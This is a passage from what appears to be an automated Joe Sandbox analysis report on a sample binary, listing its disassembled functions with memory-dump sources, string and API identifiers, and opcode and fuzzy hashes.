                                                                                                                                                                                                                                                            Function 00007FF6404F2CC4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: $
                                                                                                                                                                                                                                                            • API String ID: 0-227171996
                                                                                                                                                                                                                                                            • Opcode ID: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
                                                                                                                                                                                                                                                            • Instruction ID: 507b9e037ead1ce01559417233c4d109f09d2f7f2a832e3c305aed6d828b1908
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43E1A332A1C666E6EB68BE25C25013933AAFF45B48F244235DE4E87B94DF2DE851C740
                                                                                                                                                                                                                                                            Function 00007FF6404E95FB Relevance: 2.7, Strings: 2, Instructions: 218COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                                            • API String ID: 0-900081337
                                                                                                                                                                                                                                                            • Opcode ID: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
                                                                                                                                                                                                                                                            • Instruction ID: 1319d2c52f0ddacdce8fbea6c94faf3ba148c94d74f613ccbbd2564512c31264
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38916472A1C2A5D7E7A5FF14C498A7E3AA9FB44354F115139DA4A867C0CF3CE940CB80
                                                                                                                                                                                                                                                            Function 00007FF6404FD200 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: e+000$gfff
                                                                                                                                                                                                                                                            • API String ID: 0-3030954782
                                                                                                                                                                                                                                                            • Opcode ID: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
                                                                                                                                                                                                                                                            • Instruction ID: 07be841b36a8ad68264081b872895a435b570038f7f28e65eb5203627b8ca346
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8515662B1C2E196E725AE36A8007697B97F744B94F099231CBA8CBBC5CE3DE440C701
                                                                                                                                                                                                                                                            Function 00007FF6404FCD6C Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: gfffffff
                                                                                                                                                                                                                                                            • API String ID: 0-1523873471
                                                                                                                                                                                                                                                            • Opcode ID: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
                                                                                                                                                                                                                                                            • Instruction ID: e8e52df9954e3396bcbc7478c0accfee4df6b80ed56af9b50b08b3160b7d39ff
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DDA14562B1C796D6EB21EF29A5007AABB9AEB54B84F008132DE8D877C1DE3DD501C701
                                                                                                                                                                                                                                                            Function 00007FF6404F7AAC Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: TMP
                                                                                                                                                                                                                                                            • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                                            • Opcode ID: dd4bbb8096afc2135879a6e6acc50949ef59d292da7f7bf8111e5166495e4f15
                                                                                                                                                                                                                                                            • Instruction ID: 2473df1ada8a6ba266b1aea33a1287943bbba433d24ce6df0ced9f7c77ec0f7f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd4bbb8096afc2135879a6e6acc50949ef59d292da7f7bf8111e5166495e4f15
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B51B711F0C6A2A1FA68BB2659519BE529BAF41BCCF485434DE1DC77D6EE3CF4518300
                                                                                                                                                                                                                                                            Function 00007FF640502790 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                                                                                                                                            • Opcode ID: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
                                                                                                                                                                                                                                                            • Instruction ID: 36bfa4b50cead5a5bd0a3d3b1ddac3be11f7be548df40e15b87a432a4f5a9667
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6AB09224E0FE96D2EA0C3B116D9621822A5BF88710FA48038C41C81320DE3C20A58B00
                                                                                                                                                                                                                                                            Function 00007FF6404F28C0 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
                                                                                                                                                                                                                                                            • Instruction ID: 336e8f564976c9158b8518c6aee3c7b045aeb8a5b55644423ca815c23e672e1e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1D1D272E0C662E6EB78FE29865067D37AAEB45B48F144235CE0D87B95DF39E841C700
                                                                                                                                                                                                                                                            Function 00007FF6404E8B20 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
                                                                                                                                                                                                                                                            • Instruction ID: 45c5f041115dfadb63780dd9e3dd4908490e114eb674a5fef64bb9c898b31155
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67C1B0722182F18FD289FB29E45957A73E1F798309BD4402AEF8747B85CA3CE415D790
                                                                                                                                                                                                                                                            Function 00007FF6404F1F30 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
                                                                                                                                                                                                                                                            • Instruction ID: b04325a08f3175496b8dd0cefda34254d0f4333d9266304a8b235d24ec12a877
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5B1AD7290C7A5EAE765EF29C15023C3BAAE749B48F250235CB4E87B95CF39E441C705
                                                                                                                                                                                                                                                            Function 00007FF6404FD880 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
                                                                                                                                                                                                                                                            • Instruction ID: 89454708fc1293e8136b71d938ce85a9ae3543bd287ddbdb76430738bf94bdf9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A681D172A0C791D6EB74FF19A44036A7A97FB89794F144235DA9D83B99CF3CE5408B00
                                                                                                                                                                                                                                                            Function 00007FF640505728 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: 7a9558e86fa8b462753dac68b64cf5067dc6b1cda5ab5f882eee36bb89ede29b
                                                                                                                                                                                                                                                            • Instruction ID: 77121a806d9165bea2c7aaba9a9a6fb1808540df820670c2051d5efaa22095cf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7a9558e86fa8b462753dac68b64cf5067dc6b1cda5ab5f882eee36bb89ede29b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4261FA22E0C2A2A6F76CBA28861463E6681EF43778F144639DA7DC67D1DE7DE840C700
                                                                                                                                                                                                                                                            Function 00007FF6404F1484 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                            • Instruction ID: 47e1752d72a26e8e4a54a1118d5733f31ee3a540483ce2786929be256c82dd77
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A517476A1C661E6E724AB29C04423837A6EBD5B5CF245135CA4E977B4CF3AE842C740
                                                                                                                                                                                                                                                            Function 00007FF6404F0C64 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                            • Instruction ID: 7c82808dda6c25efef3f1126cbad555eb67c408fb4bf447356964eac5c37f20f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2516376A1C6A1D6E724AB29C04433937A6FB95B68F244231CF8D97795CF3AE843C740
                                                                                                                                                                                                                                                            Function 00007FF6404F1074 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                            • Instruction ID: 36f0126b488c0b6e6ae175e5f0f31631de28970dc0926d135239e879a17267fc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7E517536A1C6B1D6E724AB29C04423837A6EB89F58F244135CE4D977E4CF7AE843C740
                                                                                                                                                                                                                                                            Function 00007FF6404F1280 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
